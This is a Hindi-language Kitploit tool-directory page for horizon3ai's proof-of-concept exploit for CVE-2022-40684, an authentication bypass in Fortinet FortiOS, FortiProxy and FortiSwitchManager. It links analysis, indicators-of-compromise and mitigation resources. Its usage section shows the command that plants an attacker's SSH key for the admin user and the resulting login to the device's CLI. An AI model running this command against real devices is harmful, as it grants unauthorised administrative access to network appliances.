Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-40684 — CVE-2022-40684 के लिए एक प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉयट जो Fortinet FortiOS, FortiProxy, और FortiSwitchManager को प्रभावित करता है। | Kitploit
उपकरण/GitHubGitHub/horizon3ai/cve-2022-40684
शोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubhorizon3ai/cve-2022-40684

CVE-2022-40684

CVE-2022-40684 के लिए एक प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉयट जो Fortinet FortiOS, FortiProxy, और FortiSwitchManager को प्रभावित करता है।

रिपॉजिटरी देखें
3589043 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-40684

CVE-2022-40684 के लिए POC जो Fortinet FortiOS, FortiProxy, और FortiSwitchManager उपकरणों को प्रभावित करता है।

तकनीकी विश्लेषण

भेद्यता का तकनीकी मूल कारण विश्लेषण हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684

समझौता के संकेतक

Fortinet लॉग्स में समझौता के संकेतकों का विश्लेषण करने और गहन लॉग्स को सक्षम करने के तरीके के लिए हमारे IOC ब्लॉग को देखें: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/

सारांश

यह POC प्रमाणीकरण बाईपास भेद्यता का दुरुपयोग करके निर्दिष्ट उपयोगकर्ता के लिए SSH कुंजी सेट करता है।

उपयोग

root@kitploit:~
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.

शमन उपाय

नवीनतम संस्करण में अपडेट करें या Fortinet PSIRT के निर्देशों का पालन करके शमन करें

  • https://www.fortiguard.com/psirt/FG-IR-22-377

नवीनतम सुरक्षा अनुसंधान के लिए Horizon3.ai Attack Team को Twitter पर फॉलो करें:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

अस्वीकरण

यह सॉफ़्टवेयर पूरी तरह से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत स्थानों को छोड़कर सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। परियोजना अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए उत्तरदायी या जिम्मेदार नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें